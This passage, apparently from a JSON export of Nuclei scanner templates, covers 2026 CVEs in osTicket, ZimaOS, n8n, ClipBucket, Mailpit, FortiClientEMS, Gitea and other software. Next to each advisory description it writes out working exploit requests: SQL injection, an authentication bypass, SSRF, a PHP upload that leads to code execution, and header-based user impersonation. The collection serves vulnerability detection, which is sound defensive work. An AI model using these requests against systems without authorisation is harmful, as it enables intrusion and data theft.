Host: {{Hostname}}\n        Referer: {{RootURL}}/guest/s/default/?id=aa:bb:cc:dd:ee:ff&ap=00:11:22:33:44:55&ssid=test&url=http://example.com\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"<servlet>\",\"<web-app\")'\n          - 'contains(content_type, \"application/xml\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a004730450220612be690eeddd8fb01f98fabe0e3ca54e9021639315280acf2b4e4e10d5c653e022100e688234c780f8ef209e45bb350ae0b43a05c3262cb70363d4c096bc2d3d4c474:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-22557.yaml","vuln_id":"cve-2026-22557"},{"raw":"id: CVE-2026-22200\n\ninfo:\n  name: osTicket - Arbitrary File Read\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    Enhancesoft osTicket versions 1.18.x prior to 1.18.3 and 1.17.x prior to 1.17.7 contain an arbitrary file read vulnerability in the ticket PDF export functionality. A remote attacker can submit a ticket containing crafted rich-text HTML that includes PHP filter expressions which are insufficiently sanitized before being processed by the mPDF PDF generator during export. When the attacker exports the ticket to PDF, the generated PDF can embed the contents of attacker-selected files from the server filesystem as bitmap images, allowing disclosure of sensitive local files in the context of the osTicket application user. This issue is exploitable in default configurations where guests may create tickets and access ticket status, or where self-registration is enabled.\n  impact: |\n    Remote attackers can read sensitive local files, leading to information disclosure within the osTicket application context.\n  remediation: |\n    Update to a version later than 1.18.2 or the latest available version.\n  reference:\n    - https://horizon3.ai/attack-research/attack-blogs/ticket-to-shell-exploiting-php-filters-and-cnext-in-osticket-cve-2026-22200/\n    - https://github.com/horizon3ai/CVE-2026-22200/blob/main/check.py\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-22200\n  classification:\n    cve-id: CVE-2026-22200\n    epss-score: 0.73909\n    epss-percentile: 0.99457\n    cwe-id: CWE-74\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: osticket\n    product: osticket\n    shodan-query: html:\"osTicket\"\n  tags: cve,cve2026,osticket,lfi,passive,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /open.php HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: topic_id\n        regex:\n          - (?is)<option[^>]*\\bvalue=[\"'](\\d+)[\"'][^>]*>\\s*([^<]+)\\s*</option>\n          - (?is)\\bname=[\"']topicId[\"'][^>]*\\bvalue=[\"'](\\d+)[\"']\n        group: 1\n        internal: true\n\n      - type: regex\n        name: csrf_token\n        regex:\n          - name=[\"\\']__CSRFToken__[\"\\'][^>]*value=[\"\\']([^\"\\']+)[\"\\']\n          - name=[\"\\']csrf_token[\"\\'][^>]*value=[\"\\']([^\"\\']+)[\"\\']\n          - <input[^>]*type=[\"\\']hidden[\"\\'][^>]*name=[\"\\'][^\"\\']*token[^\"\\']*[\"\\'][^>]*value=[\"\\']([^\"\\']+)[\"\\']\n        group: 1\n        internal: true\n\n  - raw:\n      - |\n        POST /open.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        a=open&subject=Test+Ticket+Submission&message=%3Cimg+src%3D%22doesnotexist.jpg%22+srcset%3D%22http%3A%2F%2FPATCH_DETECT_7f3a9b2e.example.com%2Fimage-400.jpg+400w%2C+http%3A%2F%2FPATCH_DETECT_7f3a9b2e.example.com%2Fimage-800.jpg+800w%2C+http%3A%2F%2FPATCH_DETECT_7f3a9b2e.example.com%2Fimage-1200.jpg+1200w%2C+http%3A%2F%2FPATCH_DETECT_7f3a9b2e.example.com%2Fimage-1600.jpg+1600w%22+alt%3D%22Office+landscape%22+width%3D%22800%22+height%3D%22600%22+data-image%3D%22vgmd0ykzb2uq%22%3E&name=Test+User&__CSRFToken__={{csrf_token}}&topicId={{topic_id}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains_all(body, 'srcset','http://PATCH_DETECT_7f3a9b2e.example.com')\n        condition: and\n# digest: 4a0a0047304502207f289b5373a93f8a76a9d5e344f68e253ed3f0181e4622f6517b83eb8726a387022100bfc9e034527b2611606a43e3a6271020400ccf1c3f8deec9f8caa1206dd37597:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-22200.yaml","vuln_id":"cve-2026-22200"},{"raw":"id: CVE-2026-21891\n\ninfo:\n  name: ZimaOS - Authentication Bypass\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    ZimaOS <= 1.5.0 contains a broken authentication caused by improper password validation for known system service accounts in the login function, letting attackers authenticate with any password for these accounts, exploit requires knowledge of common usernames.\n  impact: |\n    Attackers can gain authenticated access to system service accounts without valid passwords, potentially compromising the system.\n  remediation: |\n    Update to a fixed version when available or apply patches to properly validate passwords for system service accounts.\n  reference:\n    - https://github.com/IceWhaleTech/ZimaOS/security/advisories/GHSA-xj93-qw9p-jxq4\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-21891\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L\n    cvss-score: 9.4\n    cve-id: CVE-2026-21891\n    cwe-id: CWE-287\n    epss-score: 0.0235\n    epss-percentile: 0.82941\n    cpe: cpe:2.3:o:zimaspace:zimaos:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"ZimaOS\"\n    product: zimaos\n    vendor: zimaspace\n  tags: cve,cve2026,zimaos,auth-bypass,broken-auth,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /v1/users/login HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json, text/plain, */*\n        Content-Type: application/json\n        Origin: {{RootURL}}\n        Referer: {{RootURL}}/\n\n        {\n          \"username\": \"root\",\n          \"password\": \"anything\"\n        }\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"success\"\n          - \"username\"\n          - \"created_at\"\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100abd0b3e181c649b13cffa19214a58ae6851bafa41df3af12752862babf154e44022100d690a86e7843efb0540eba5b00f7b10a69414feb5c1528e4e299f3163ed4e12c:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-21891.yaml","vuln_id":"cve-2026-21891"},{"raw":"id: CVE-2026-21877\n\ninfo:\n  name: n8n >= 0.123.0 and < 1.121.3 - Remote Code Execution\n  author: s4e-io\n  severity: critical\n  description: |\n    n8n versions >= 0.123.0 and < 1.121.3 contain a critical authenticated remote code execution vulnerability via arbitrary file write. An authenticated user can exploit the Git node to overwrite critical files and execute untrusted code on the n8n server, potentially leading to full system compromise. The vulnerability affects both self-hosted and n8n Cloud instances.\n  impact: |\n    Full system compromise including access to all credentials, API tokens, OAuth secrets, database connections, and workflow automation capabilities. n8n becomes a single point of failure exposing all connected systems.\n  remediation: |\n    Upgrade to n8n v1.121.3 or later. If upgrading is not immediately possible, disable the Git node and limit access for untrusted users.\n  reference:\n    - https://github.com/n8n-io/n8n/security/advisories/GHSA-v364-rw7m-3263\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-21877\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 9.9\n    cve-id: CVE-2026-21877\n    epss-score: 0.05449\n    epss-percentile: 0.92371\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: n8n-io\n    product: n8n\n    shodan-query: http.favicon.hash:-831756631\n    fofa-query: icon_hash=\"-831756631\"\n  tags: cve,cve2026,n8n,workflow,rce,authenticated,passive,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/signin\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<title>n8n.io\"\n        case-insensitive: true\n\n      - type: dsl\n        name: vulnerable\n        dsl:\n          - compare_versions(version, '>= 0.123.0', '< 1.121.3')\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: base64_content\n        group: 1\n        regex:\n          - '<meta name=\"n8n:config:sentry\" content=\"([A-Za-z0-9+/=]+)\"'\n        internal: true\n\n      - type: dsl\n        name: version\n        dsl:\n          - 'replace_regex(base64_decode(base64_content), \".*n8n@([0-9]+\\\\.[0-9]+\\\\.[0-9]+).*\", \"$1\")'\n        internal: true\n\n      - type: dsl\n        dsl:\n          - '\"n8n Version: \" + version'\n# digest: 4a0a00473045022011b9ee601883b992704f45533a4bfbb74508cb21b31616717e6f4ef2efbf5521022100ad75ab1fd7f9dfdab3722d0cfde67773f006dbe3b5400522516f13751c04e05a:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-21877.yaml","vuln_id":"cve-2026-21877"},{"raw":"id: CVE-2026-21875\n\ninfo:\n  name: ClipBucket v5 <= 5.5.2 - Unauthenticated Blind SQL Injection\n  author: str4k3r,0x_Akoko\n  severity: critical\n  description: |\n    ClipBucket v5.5.2-#187 and below contain a blind SQL injection caused by unsanitized obj_id parameter in /actions/ajax.php used in user_exists function, letting attackers perform blind SQL injection remotely, exploit requires crafted POST request.\n  impact: |\n    Attackers can perform blind SQL injection to extract or manipulate database information remotely.\n  remediation: |\n    Update to the latest version once a fix is available.\n  reference:\n    - https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-crpv-fmc4-j392\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-21875\n  classification:\n    cve-id: CVE-2026-21875\n    epss-score: 0.01527\n    epss-percentile: 0.73568\n    cwe-id: CWE-89\n    cvss-score: 9.8\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: macwarrior\n    product: clipbucket\n    shodan-query: http.html:\"ClipBucket\"\n    fofa-query: body=\"ClipBucket\" || body=\"clipbucket\"\n  tags: cve,cve2026,clipbucket,sqli,blind-sqli,time-based,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(tolower(body), \"clipbucket\", \"cb_v5\", \"clip-bucket\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 10s\n        POST /actions/ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        mode=add_comment&type=channel&reply_to=1&obj_id=999999%27%20OR%20(userid%3D1%20AND%20SLEEP(6))--%20-&name=test&email=test%40gmail.com&comment=testing\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"channel_not_exist\")'\n          - 'duration >= 6'\n        condition: and\n# digest: 4b0a00483046022100d495715924c3ef34d8e4920a16b03b7bd52bd383367e61eaa173461ef4b6f4f8022100838374a484683151e4858475984311a4c89d3d38cf33ecaf6c8ecdef72a4e474:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-21875.yaml","vuln_id":"cve-2026-21875"},{"raw":"id: CVE-2026-21859\n\ninfo:\n  name: Mailpit < 1.28.3 - Server-Side Request Forgery\n  author: omarkurt\n  severity: high\n  description: |\n    Mailpit <= 1.28.0 contains a server-side request forgery caused by insufficient validation of internal IP addresses in the /proxy endpoint, letting attackers make requests to internal network resources, exploit requires crafted HTTP GET requests.\n  impact: |\n    Attackers can access internal network services and APIs, potentially exposing sensitive internal resources.\n  remediation: |\n    Update to version 1.28.1 or later.\n  reference:\n    - https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/\n    - https://github.com/axllent/mailpit/security/advisories/GHSA-8v65-47jx-7mfr\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    cve-id: CVE-2026-21859\n    epss-score: 0.00825\n    epss-percentile: 0.55858\n    cwe-id: CWE-918\n    cpe: cpe:2.3:a:axllent:mailpit:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: axllent\n    product: mailpit\n    shodan-query: title:\"Mailpit\"\n    fofa-query: title=\"Mailpit\"\n  tags: cve,cve2026,mailpit,axllent,oast,oob,ssrf,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /proxy?url=http://127.0.0.1:8025/api/v1/info HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"Version\"'\n          - '\"Database\"'\n          - '\"RuntimeStats\"'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402207968fb7642fcac7c4cd8bed8038eacd455a4a05e435288c1e244bf497c6936c7022072cbb30efc77673145331ba05277506d8e0390a7fa82b24af8aeac9e6705dc12:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-21859.yaml","vuln_id":"cve-2026-21859"},{"raw":"id: CVE-2026-21858\n\ninfo:\n  name: n8n Webhooks - Remote Code Execution\n  author: rxerium\n  severity: critical\n  description: |\n    n8n is an open source workflow automation platform. Versions starting with 1.65.0 and below 1.121.0 enable an attacker to access files on the underlying server through execution of certain form-based workflows. A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system and may enable further compromise depending on deployment configuration and workflow usage. This issue is fixed in version 1.121.0.\n  impact: |\n    Unauthenticated remote attackers can access sensitive files, potentially leading to information disclosure and further system compromise.\n  remediation: |\n    Update to version 1.121.0 or later.\n  reference:\n    - https://thehackernews.com/2026/01/critical-n8n-vulnerability-cvss-100.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-21858\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N\n    cvss-score: 10.0\n    cve-id: CVE-2026-21858\n    epss-score: 0.78447\n    epss-percentile: 0.99563\n    cwe-id: CWE-20\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: http.favicon.hash:-831756631\n  tags: cve,cve2026,n8n,workflow,rce,vkev,vuln\n\nflow: http(1) || http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/signin\"\n\n    host-redirects: true\n    max-redirects: 3\n\n    extractors:\n      - type: regex\n        name: base64_content\n        group: 1\n        regex:\n          - '<meta name=\"n8n:config:sentry\" content=\"([A-Za-z0-9+/=]+)\"'\n        internal: true\n\n      - type: dsl\n        name: version\n        dsl:\n          - 'replace_regex(base64_decode(base64_content), \".*n8n@([0-9]+\\\\.[0-9]+\\\\.[0-9]+).*\", \"$1\")'\n        internal: true\n\n      - type: dsl\n        dsl:\n          - '\"n8n Version: \" + version'\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<title>n8n.io\"\n        case-insensitive: true\n\n      - type: status\n        status:\n          - 200\n\n      - type: dsl\n        dsl:\n          - 'compare_versions(version, \">= 1.65.0\", \"< 1.121.0\")'\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/rest/sentry.js\"\n\n    extractors:\n      - type: regex\n        name: version\n        group: 1\n        regex:\n          - 'release\":\"([0-9.]+)\"'\n        internal: true\n\n      - type: dsl\n        dsl:\n          - '\"n8n Version: \" + version'\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"release\"'\n        case-insensitive: true\n\n      - type: status\n        status:\n          - 200\n\n      - type: dsl\n        dsl:\n          - compare_versions(version, '>= 1.65.0', '< 1.121.0')\n# digest: 4b0a00483046022100cc0b5840916b4acf239edc209b88ee6fc8bdfa500be208ac6df4a21fedb6ec91022100e80184e6eb4081b793861ae0dd1dcaf1bb228be737a51ecb2c14b1cafcfa18a9:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-21858.yaml","vuln_id":"cve-2026-21858"},{"raw":"id: CVE-2026-21643\n\ninfo:\n  name: Fortinet FortiClientEMS 7.4.4 - SQL Injection\n  author: ritikchaddha\n  severity: critical\n  description: |\n    Fortinet FortiClientEMS version 7.4.4 and earlier contains an unauthenticated SQL injection vulnerability in the /api/v1/init_consts endpoint. The 'Site' HTTP header value is passed directly into the PostgreSQL search_path without sanitization, allowing remote unauthenticated attackers to inject arbitrary SQL commands. This can lead to information disclosure, database manipulation, or OS command execution when chained with PostgreSQL functions.\n  impact: |\n    An unauthenticated remote attacker can execute arbitrary SQL queries against the backend PostgreSQL database, potentially extracting sensitive data, modifying database contents, or achieving remote code execution through PostgreSQL-specific functions (e.g., COPY, lo_import, pg_read_file).\n  remediation: |\n    Upgrade FortiClientEMS to a patched version as recommended by Fortinet. As a workaround, restrict network access to the FortiClientEMS management interface and apply WAF rules to filter malicious Site header values.\n  reference:\n    - https://www.fortiguard.com/psirt/FG-IR-2026-21643\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-21643\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-21643\n    cwe-id: CWE-89\n    epss-score: 0.94085\n    epss-percentile: 0.99844\n  metadata:\n    verified: false\n    max-request: 2\n    vendor: fortinet\n    product: forticlientems\n    shodan-query: http.favicon.hash:-800551065\n    fofa-query: icon_hash=\"-800551065\"\n  tags: cve,cve2026,sqli,forticlient,ems,fortinet,,vkev,kev\n\nhttp:\n  - raw:\n      - |\n        GET /api/v1/init_consts HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        @timeout: 20s\n        GET /api/v1/init_consts HTTP/1.1\n        Host: {{Hostname}}\n        Site: tenant1; SELECT pg_sleep(8)--\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body_1, \"SITES_ENABLED\\\": true\")'\n\n      - type: dsl\n        name: time-based\n        dsl:\n          - \"duration_2>=8\"\n          - \"status_code_2 == 500\"\n        condition: and\n# digest: 4a0a0047304502206365f9395407a9ca6af06f69508a3abb59a77a8b46da45b247547e1fd71bedbc0221009190229f61dcfaf90f7bed6a86dd66d78d6d9cfba95bb87e9580946f8d7c5759:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-21643.yaml","vuln_id":"cve-2026-21643"},{"raw":"id: CVE-2026-21484\n\ninfo:\n  name: AnythingLLM - Username Enumeration via Password Recovery\n  author: DhiyaneshDk\n  severity: medium\n  description: |\n    AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to commit e287fab56089cf8fcea9ba579a3ecdeca0daa313, the password recovery endpoint returns different error messages depending on whether a username exists, so enabling username enumeration. Commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 fixes this issue.\n  impact: |\n    Attackers can enumerate valid usernames, aiding further targeted attacks or social engineering.\n  remediation: Update to the version including commit e287fab56089cf8fcea9ba579a3ecdeca0daa313 or later.\n  reference:\n    - https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-47vr-w3vm-69ch\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-21484\n    epss-score: 0.00779\n    epss-percentile: 0.54408\n    cwe-id: CWE-203,CWE-204\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: mintplex-labs\n    product: anything-llm\n    shodan-query: http.favicon.hash:-1279687529\n  tags: cve,cve2026,anythingllm,user-enum\n\nvariables:\n  rc1: \"{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}\"\n  rc2: \"{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}\"\n  rc3: \"{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}\"\n  rc4: \"{{rand_text_alphanumeric(8)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(4)}}-{{rand_text_alphanumeric(12)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/system/recover-account HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"username\":\"{{randstr}}\",\"recoveryCodes\":[\"{{rc3}}\",\"{{rc4}}\"]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 400'\n          - 'contains_all(body, \"Invalid recovery codes\",\"success\")'\n        condition: and\n# digest: 4a0a00473045022100c6953d976939055452192c664ede55dd7a2ecd4461e5dce94906354d70b24bd302203976952be53c913972172e24a27e11a3b06a692daa2e6de8dc73d57797a013a5:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-21484.yaml","vuln_id":"cve-2026-21484"},{"raw":"id: CVE-2026-21445\n\ninfo:\n  name: Langflow - Broken Access Control\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0.dev45, multiple critical API endpoints in Langflow are missing authentication controls. The issue allows any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.\n  remediation: Update to version 1.7.0.dev45 or later.\n  impact: |\n    Unauthenticated attackers can access sensitive user data and perform destructive actions, risking data loss and privacy breaches.\n  reference:\n    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-21445\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2026-21445\n    cwe-id: CWE-306\n    epss-score: 0.3371\n    epss-percentile: 0.98315\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: langflow-ai\n    product: langflow\n    shodan-query: html:\"Langflow\"\n  tags: cve,cve2026,langflow,auth-bypass,unauth,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v1/monitor/messages\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"text\":'\n          - '\"timestamp\":'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100f470f19d9f54e6e6dc23ba7446244161114db2f5e25a92ce963b9167fc1d1f56022100edaa078093fa07cdfc595a1afd85bebe0a1215fa3c2d492b7731c16fc74b5f80:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-21445.yaml","vuln_id":"cve-2026-21445"},{"raw":"id: CVE-2026-2113\n\ninfo:\n  name: tpadmin <= 1.3.12 - Remote Code Execution\n  author: jankesec\n  severity: critical\n  description: |\n    yuan1994 tpadmin up to version 1.3.12 is vulnerable to Remote Code Execution via unrestricted file upload in the WebUploader preview component (/public/static/admin/lib/webuploader/0.1.5/server/preview.php). An unauthenticated remote attacker can submit base64-encoded PHP payloads leading to arbitrary code execution with web server privileges.\n  impact: |\n    Unauthenticated remote attackers can execute arbitrary PHP code on the server, leading to full system compromise.\n  remediation: |\n    Delete or restrict access to the preview.php script or upgrade to a patched version.\n  reference:\n    - https://github.com/yuan1994/tpadmin\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-2113\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-2113\n    epss-score: 0.02034\n    epss-percentile: 0.80218\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: yuan1994\n    product: tpadmin\n    shodan-query: http.html:\"tpadmin\"\n    fofa-query: body=\"tpadmin\"\n  tags: cve,cve2026,tpadmin,rce,file-upload,webuploader,intrusive\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /public/static/admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        data:image/php;base64,PD9waHAgZWNobyBtZDUoJ2N2ZS0yMDI2LTIxMTMnKTs/Pg==\n\n      - |\n        POST /static/admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        data:image/php;base64,PD9waHAgZWNobyBtZDUoJ2N2ZS0yMDI2LTIxMTMnKTs/Pg==\n\n    stop-at-first-match: true\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"jsonrpc\"'\n          - 'preview/'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: preview_path\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - '\"result\" : \"https?://[^/\"]+(/[^\"]+\\.php)\"'\n\n  - raw:\n      - |\n        GET {{preview_path}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"8d545c3577fdfbf5ae9e254ca893a0ef\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100fe551b93796f6b3265a4326a1c7dbd2f53c6477c7ae1ae0692444c23f5a57d9e022100d5c1bf0e1be99ff060022dbc4f85097c26c6706ec640477ddaa3720c9bb3b5b4:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-2113.yaml","vuln_id":"cve-2026-2113"},{"raw":"id: CVE-2026-20896\n\ninfo:\n  name: Gitea Docker Image <= 1.26.2 - Reverse Proxy Header Authentication Bypass\n  author: prithvee07\n  severity: critical\n  description: |\n    The official Gitea Docker image through version 1.26.2 ships with REVERSE_PROXY_TRUSTED_PROXIES set to a wildcard, causing Gitea to trust reverse-proxy authentication headers (X-WEBAUTH-USER) from any source IP instead of restricting trust to the configured reverse proxy. When reverse-proxy authentication is enabled, an unauthenticated remote attacker can impersonate any existing user, including an administrator, by sending the target username in the X-WEBAUTH-USER header.\n  impact: |\n    Unauthenticated attackers can impersonate any Gitea user, including administrators, gaining read access to all private repositories, the ability to inject SSH keys, extract CI/CD secrets, modify webhooks, and fully compromise the platform.\n  remediation: |\n    Upgrade the Gitea Docker image to version 1.26.3 or 1.26.4 or later, which restricts REVERSE_PROXY_TRUSTED_PROXIES to the intended internal proxy addresses.\n  reference:\n    - https://github.com/go-gitea/gitea/security/advisories/GHSA-f75j-4cw6-rmx4\n    - https://blog.gitea.com/release-of-1.26.3-and-1.26.4/\n    - https://github.com/go-gitea/gitea/pull/38151\n    - https://www.ionix.io/threat-center/cve-2026-20896/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-20896\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-20896\n    epss-score: 0.02755\n    epss-percentile: 0.85589\n    cwe-id: CWE-290\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: gitea\n    product: gitea\n    shodan-query: title:\"Gitea\"\n    fofa-query: app=\"Gitea\"\n  tags: cve,cve2026,gitea,docker,auth-bypass,unauth,vkev\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - raw:\n      - |\n        GET /api/v1/version HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'compare_versions(version, \"<= 1.26.2\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: json\n        name: version\n        json:\n          - '.version'\n        internal: true\n\n  - raw:\n      - |\n        GET /api/v1/users/search?limit=1 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"ok\\\":true\")'\n          - 'len(victim) > 0'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: json\n        name: victim\n        json:\n          - '.data[0].login'\n        internal: true\n\n  - raw:\n      - |\n        GET /api/v1/user HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 401'\n        internal: true\n\n  - raw:\n      - |\n        GET /api/v1/user HTTP/1.1\n        Host: {{Hostname}}\n        X-WEBAUTH-USER: {{victim}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, concat(\"\\\"login\\\":\\\"\", victim, \"\\\"\"))'\n          - '!contains(body, \"token is required\")'\n        condition: and\n# digest: 4b0a00483046022100a50e2cfa6fa944ab27b99398a03211d128b239a8b436d991e52ddefc3373e688022100bc7d7e973d741a98822b7e08d18a3176b1b886ee6064cc4a74502b0a92d1a747:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-20896.yaml","vuln_id":"cve-2026-20896"},{"raw":"id: CVE-2026-20253\n\ninfo:\n  name: Splunk Enterprise & Cloud Platform - Unrestricted File Upload\n  author: watchtowrlabs,DhiyaneshDk\n  severity: critical\n  description: |\n    In Splunk Enterprise versions below 10.2.4 and 10.0.7, and Splunk Cloud Platform versions below 